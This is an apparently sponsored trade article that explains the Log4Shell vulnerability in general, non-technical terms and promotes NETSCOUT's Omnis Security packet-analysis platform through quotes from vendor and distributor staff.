On 09 December, 2021, the world was alerted to the Log4j vulnerability [CVE-2021-44228 aka Log4Shell]. It is likely that threat actors already knew about the vulnerability before this date, says Tom Bienkowski, NETSCOUT Product Marketing Director, because it’s been reported that the vulnerability had been exposed much earlier in Minecraft chat forums.
How does Log4j work – and what lessons does it bring?
Log4j, which is open-source software provided by the Apache Software Foundation, records errors and routine system operations, and sends diagnostic messages about them to system administrators and users. A common example of Log4j is when a user types in or clicks on a bad web link and they receive a 404 error message. The web server running the domain of the attempted web link sends a message to say that the website doesn’t exist, and it also records that event in a log for the server’s system administrators using Log4j. In Minecraft, Log4j is used by the server to log activity like total memory used and user commands typed into the console.
Log4Shell works by abusing a feature in Log4j that allows users to specify custom code for formatting a log message. However, unfortunately this kind of code allows third-party servers to submit software code that can perform all kinds of actions on the targeted computer. This opens the door for threat actors to steal sensitive information and send malicious content to other users communicating with the affected server.
“This vulnerability alerts us to the fact that it is time to start paying attention to packet-based investigations of exploitation,” says Ruan du Preez, Vendor Alliance Director – SA and SADC at Exclusive Networks Africa. “The issue with the Log4j vulnerability was that it could be exploited to download and execute common crypto mining malware, webshells, Cobalt Strike beacons – and undoubtedly ransomware.”
Bienkowski notes that: “Scanning and patching your vulnerable servers (if you can find them all) is absolutely the best defence against this exploit. But that takes time – a lot of time. Therefore, it should be assumed that before or during this time, bad actors have already compromised one or more of your vulnerable servers.”
He therefore advocates considering the use of packet-based threat detection and investigation as one of the possible tools to detect and remediate the exploitation of such a vulnerability – an area where NETSCOUT undoubtedly excels.
The visibility challenge
Du Preez continues: “In today’s complex networking world – which encompasses legacy networks, branch offices, work-from-home situations and public and private clouds – gaining the proper level of network visibility is more challenging than ever. The threat surface is expanding, and the number of security tools has increased, giving rise to siloed data. Putting this all together, it means that a lack of comprehensive and consistent network visibility makes it harder for cybersecurity teams to conduct expedient and effective threat detection and response.
“In addition, when new technologies are implemented rapidly to meet business needs, this often means that security is compromised. This approach can limit visibility and cause security blind spots, which are attractive to threat agents. How do you protect yourself from threats that you can’t see?”
NETSCOUT digs deep into the visibility challenge
NETSCOUT’s solution to this challenge is Omnis™ Security, a platform for advanced threat analytics and response, which provides comprehensive and consistent network visibility for effective cybersecurity.
NETSCOUT’s patented Smart Data technology provides unequalled visibility by uniquely converting network packets into an intelligent source of data. NETSCOUT has now incorporated that same technology into a cybersecurity solution that offers comprehensive network visibility and more efficient cyberthreat detection and response.
About Omnis Security from NETSCOUT
Unlike security information and event management solutions (SIEMs), endpoint detection and response (EDR), or user behaviour analytics (UBA) security technologies, Omnis Security transforms packet data into real-time threat awareness indicators. It empowers your team with relevant contextual data, allowing for swift, decisive action, smarter investigation, and faster, more accurate remediation, as follows:
- You can identify the deep attack context and quickly assess the extent of the breach to isolate the risk.
- You are able to remediate more quickly and accurately than using only non-network traffic data sources.
- Vital forensic reports are created, for law enforcement and support reporting obligations according to legislation.
“In the event of a malware attack,” says Du Preez, “NETSCOUT Omnis security offers deep visibility into network traffic, including packet level visibility that can also automatically create a robust set of metadata that gives you visibility into all seven layers of the OSI model, and for many different protocols.
“Omnis further provides the ability to continuously capture and store this robust set of packet-based metadata for real-time and retrospective analysis. Additionally, Omnis infuses this packet-based data with multiple sources of threat intelligence, to automatically detect and conduct analysis of this data, as well as the ability to conduct high performing decryption.
“While it is true that you can’t protect yourself against a danger that you cannot see, it is also true that in the networking security environment, NETSCOUT is uniquely qualified to be your eyes,” he concludes.
NETSCOUT is distributed throughout Sub-Saharan Africa by Exclusive Networks Africa.